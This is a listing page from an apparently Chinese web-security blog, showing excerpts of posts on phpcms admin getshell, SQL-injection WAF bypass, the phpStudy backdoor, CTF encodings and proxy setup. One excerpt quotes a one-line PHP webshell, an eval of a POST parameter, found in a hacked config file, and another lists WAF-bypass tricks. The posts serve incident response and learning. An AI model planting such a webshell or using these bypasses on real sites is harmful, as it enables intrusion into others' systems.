今天所做的努力
都是在为明天积蓄力量

WEB安全

phpcms后台getshell-流觞

phpcms后台getshell

无依阅读(584)评论(0)赞(0)

今天在处理phpcms挂马的时候遇到一个一句话木马cachesconfigssystem.php  \',@eval/**/($_POST[123]),// 想了一下这个应该是网站后台写入配置文件,就网上找了一下getshell方法,记录一...

使用SSR结合BurpSuite多重代理进行抓包

无依阅读(4257)评论(0)赞(4)

多重代理的情形 在某些网络环境中,为了翻墙,浏览器已经设置了SSR的代理,但是如果想对国外的网站使用BurpSuite进行渗透测试,那怎么设置代理? 这时候不能简单的把浏览器的代理设置为burpsuite,虽然能抓到包,但是却访问不了外网了...

CTF中常见的编码,代码混淆及加、解密-流觞

CTF中常见的编码,代码混淆及加、解密

无依阅读(2943)评论(0)赞(1)

其实刚开始我对编码与加密的概念区分的不是非常清楚,一度以为加密就是对信息进行编码,这是一种错误的观点。编码是将数据信息转化成一种固定格式的编码信息,而加密是为了保证信息传输的安全性,两者还是有区别的。接下来就给大家讲讲编码与加密、解密。 一...

SQL注入中的WAF绕过技术

无依阅读(2139)评论(0)赞(2)

1.大小写绕过 这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。 2.简单编码绕过 比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也...

PhpStudy2016-2018后门漏洞预警及漏洞修复

无依阅读(3003)评论(0)赞(0)

PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本及路径 通过分析,后门代码存在于extphp...

网站被镜像后期溯源查找镜像来源1

无依阅读(4017)评论(0)赞(0)

之前网站被镜像虽然处理了:怎么处理网站被镜像,无法获取采集来源ip,通过js进行跳转防采集,但是还是很不甘心,在想能不能找到他抓取来源的ip。 先检测一下域名whois查看是哪里注册的,域名所有者是谁? 在https://x.threatb...

今天所做的努力都是在为明天积蓄力量

联系我们关于小站